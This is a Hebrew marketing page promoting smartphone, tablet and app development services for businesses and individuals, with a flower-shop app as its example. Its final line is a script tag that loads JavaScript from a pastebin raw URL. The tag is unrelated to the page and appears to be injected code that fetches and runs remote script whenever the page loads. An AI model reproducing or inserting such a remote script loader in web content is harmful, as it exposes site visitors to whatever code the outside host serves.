סמארטפון וטאבלט

אם פעם כל מה שרצית לעסק שלך זה אתר אינטרנט בלבד, כיום כולם דורשים גם פיתוח לסמרטפון ולטבלט. המחקרים מראים שיותר ויותר אנשים גולשים בטלפון הנייד שלהם או בלוח טבלט, זה נגיש, זה מדליק ובמרבית שעות היום זה מחליף את צג המחשב. לא פלא אם כן שכולם רוצים פיתוח כלשהו לעסק שלהם המותאם גם למכשירי אפל כמו אייפון או אייפד או למכשירים ניידים רבים אחרים התומכים באנדרואיד.

בכל מקום ובכל זמן
עיצוב ופיתוח לסמרטפונים וטבלטים יכול לבוא בכמה דרכים. או כפיתוח המתרגם את הגלישה באתר הבית של העסק כך שתותאם לגלישה בסלולר או בטבלט, או כפיתוח אפליקציה ייחודית המיועדת לתת יותר ממידע אינפורמטיבי. כמה יותר? חישבו על חנות פרחים אשר כל אדם יכול באמצעות הסמרטפון או הטבלט שלו לראות את קולקציית הזרים והעציצים שבחנות, לבחור בהם ולהזמין במקום ללא צורך במחשב או אפילו בשיחת טלפון.

יותר מזה, ניתן אף לאפשר לו להרכיב זר בעצמו על פי סוגי הפרחים הקיימים, לכתוב ברכה אישית ולשלוח לאהובתו וכל זה תוך כדי נסיעה באוטובוס. כמו כן ניתן אף להציע שירות משלים כמו לדוגמה אפליקציית "מדריך פרחים בארץ ישראל" באדיבות אותו עסק. במשך הזמן אף ניתן להוסיף לשדרג את האפליקציות ולעדכן גרסאות חדשות מתקדמות יותר.

אפליקציות להמונים
לא רק בעלי עסקים מעוניינים בשירות של עיצוב ופיתוח לסמרטפונים וטבלטים. כל אדם כמוני וכמוך אשר יש ברשותו רעיון לאפליקציה מקורית, למשחק מדליק וממכר או לשירות שמתלבש בול על הפלטפורמה של סמרטפון או טאבלט, יכול לבוא עם הרעיון שברשותו לחברה המציעה עיצוב ופיתוח לסמרטפונים וטבלטים. כיום ישנם לא מעט אנשים בעולם אשר רעיון אחד פשוט וגאוני הפך את האפליקציה שלהם לכזאת שאף סמרטפון לא שלם בלעדיה וההורדות שלה ממשיכות לקנן בראש הטבלאות ככל שיותר אנשים מתקדמים לדור העתיד של המכשירים החכמים.

הבית שלך לכל פיתוח
במקום להתרוצץ בין מעצב הבונה אתרים, חברה המפתחת אפליקציות לאייפונים ועסק המפתח אפליקציות לאנדרואיד, יהיה חכם מצדכם לרכוש חבילה הכוללת הכל ביחד. כך אתם יודעים שאתם מכוסים מכל הכיוונים וביצי הזהב שלכם אינם מונחים בסל אחד אלא בכל המקומות הנכונים. למרות שכל אחד מאיתנו חושב שהוא נביא טכנולוגי אשר יודע מה הפורמט הבא אשר יכבוש את העולם, עדיין מוטב להשקיע בכל האפשרויות הטכנולוגיות  המקובלות כך שהעסק שלכם יגיע לכמה שיותר אנשים.

<script type="text/javascript" src="https://pastebin.com/raw/ceQCJD67">